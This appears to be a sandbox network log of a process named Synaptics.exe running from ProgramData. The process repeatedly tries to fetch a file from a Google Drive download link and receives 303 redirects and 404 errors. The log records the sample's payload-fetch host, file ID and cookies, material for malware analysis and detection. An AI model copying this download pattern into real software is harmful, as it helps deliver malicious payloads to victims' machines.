                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                                                                                                                                      2024-12-30 10:23:22 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:22 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-0g2PThPSBIq2jv84aoziZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      62 | 192.168.2.5 | 49837 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:22 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:22 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5Tfmin-xJHMPsXKvU440hGWC3EKIfnkTfHdVWT42uKnOo-Pfl4710PAJaB2xAbqUM5zKbzwyQ
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:22 GMT
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xR1V8mR_Ph1vVYEWdBRfNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:22 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:22 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="CJQ0jyaw2nF2eS58W16tmw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:22 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      63 | 192.168.2.5 | 49836 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:22 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:22 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:22 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-N7HIdsWN8awu6PlDN-ecFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      64 | 192.168.2.5 | 49849 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:23 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:23 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-9Hf4vMjTcp0R8uumOMPd5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      65 | 192.168.2.5 | 49850 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:23 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:23 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-g9UfYUUPiYwbmjkqiM5XRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      66 | 192.168.2.5 | 49851 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:23 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:23 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5KeSs4HnPBWgOkUlGJtnBsPYzT91RVoCvEFgC4i2OJognPef2dO63njyeUbNVs0acX
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:23 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-d0jFUUaeKHrMltp4L215pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:23 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:23 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="QM_MstKYbMg-NB9qJh-qMw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:23 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      67 | 192.168.2.5 | 49854 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:23 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:24 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6Zq8sTeMBuEhW9JUqnl0HI1zzCMSCevXuS2Zf1e0ZMoJ7nvvt59BfNaPnDWZd2y4-z
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:23 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-yC2sheh8fLVQg13vR2614Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:24 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:24 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="u8BVzQbQpWzGxi8SM6pu-A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:24 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      68 | 192.168.2.5 | 49860 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:24 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:24 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-cPsrBQ8T9cYw3pwzaSfNYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      69 | 192.168.2.5 | 49861 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:24 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      70 | 192.168.2.5 | 49862 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:24 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      71 | 192.168.2.5 | 49865 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:24 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      72 | 192.168.2.5 | 49877 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:25 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:25 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4rBfxh_2NjrexE68ed_ywLpzGraTm7-5ay0X3TFOxkY2psU7uHBbxOxi8AzkQrnjfHZMtBius
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:25 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ty3dGGW3iXHtJn3rKJywzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
